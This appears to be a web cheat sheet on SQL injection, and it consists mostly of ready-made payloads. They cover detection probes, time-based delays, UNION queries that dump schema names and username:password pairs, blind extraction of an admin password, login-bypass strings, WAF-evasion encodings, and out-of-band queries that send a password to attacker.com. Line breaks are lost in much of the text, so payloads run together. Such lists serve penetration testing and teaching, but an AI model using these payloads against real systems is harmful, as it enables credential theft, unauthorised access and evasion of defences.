What is SQL Injection?
A security vulnerability that occurs when an attacker can insert malicious SQL code into queries that an application makes to its database.
SQL Injection Complete Guide
Potential Impact
- Unauthorized data access
- Data manipulation/deletion
- Authentication bypass
- Server compromise
- Denial of service
Risk Level
SQL injection is considered a critical vulnerability (CVSS Score: 7.0-10.0) that can lead to complete system compromise.
Detection Techniques
Initial Testing
-
Basic Character Tests
[Nothing]'"`')")`)'))"))`)) -
Database-Specific Comments
#comment-- comment [Space required after --]/*comment*//*! MYSQL Special SQL */--comment/*comment*/--comment/*comment*/--comment--comment/*comment*/ -
Logical Operations Testing
page.asp?id=1 or 1=1 # True conditionpage.asp?id=1' or 1=1 # True with string terminationpage.asp?id=1" or 1=1 # True with double quotepage.asp?id=1 and 1=2 # False condition
Time-Based Detection
1' + sleep(10)1' and sleep(10)1' && sleep(10)1' | sleep(10)1' || pg_sleep(10)1' WAITFOR DELAY '0:0:10'1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))Exploitation Techniques
UNION Based Attacks
-
Column Count Detection
# Using ORDER BY1' ORDER BY 1--+1' ORDER BY 2--+1' ORDER BY 3--+# Using UNION SELECT1' UNION SELECT null--1' UNION SELECT null,null--1' UNION SELECT null,null,null-- -
Data Extraction
# Database names-1' UNION SELECT 1,2,GROUP_CONCAT(schema_name)FROM information_schema.schemata--# Table names-1' UNION SELECT 1,2,GROUP_CONCAT(table_name)FROM information_schema.tablesWHERE table_schema='target_db'--# Column names-1' UNION SELECT 1,2,GROUP_CONCAT(column_name)FROM information_schema.columnsWHERE table_name='target_table'-- -
Data Retrieval
-1' UNION SELECT 1,2,GROUP_CONCAT(username,':',password)FROM users--
Blind SQL Injection
Boolean Based
# Test each character1 AND SUBSTRING((SELECT password FROM usersWHERE username = 'admin'),1,1) = 'a'Time Based
1 AND IF(SUBSTRING((SELECT password FROM usersWHERE username = 'admin'),1,1) = 'a',SLEEP(5), 0)Authentication Bypass Techniques
admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin') or ('1'='1admin') or ('1'='1'--admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*WAF Bypass Techniques
Space Character Bypasses
Using Encoded Characters
id=1%09and%091=1%09--id=1%0Dand%0D1=1%0D--id=1%0Cand%0C1=1%0C--id=1%0Band%0B1=1%0B--id=1%0Aand%0A1=1%0A--Using Comments
id=1/**/and/**/1=1/**/--id=(1)and(1)=(1)--SQL Keyword Bypasses
AND -> && -> %26%26OR -> || -> %7C%7C= -> LIKE, REGEXP, RLIKE> X -> NOT BETWEEN 0 AND X-- comment# comment/*comment*/;%00Out of Band (OOB) Techniques
DNS Exfiltration
# MySQLSELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users WHERE id=1), '.attacker.com\\1.txt'));
# OracleSELECT UTL_HTTP.REQUEST ('http://attacker.com/'||(SELECT user FROM DUAL)) FROM DUAL;Additional Resources
OWASP SQL Injection Guide Comprehensive guide from OWASP about SQL injection
PortSwigger Web Security Academy Interactive SQL injection learning materials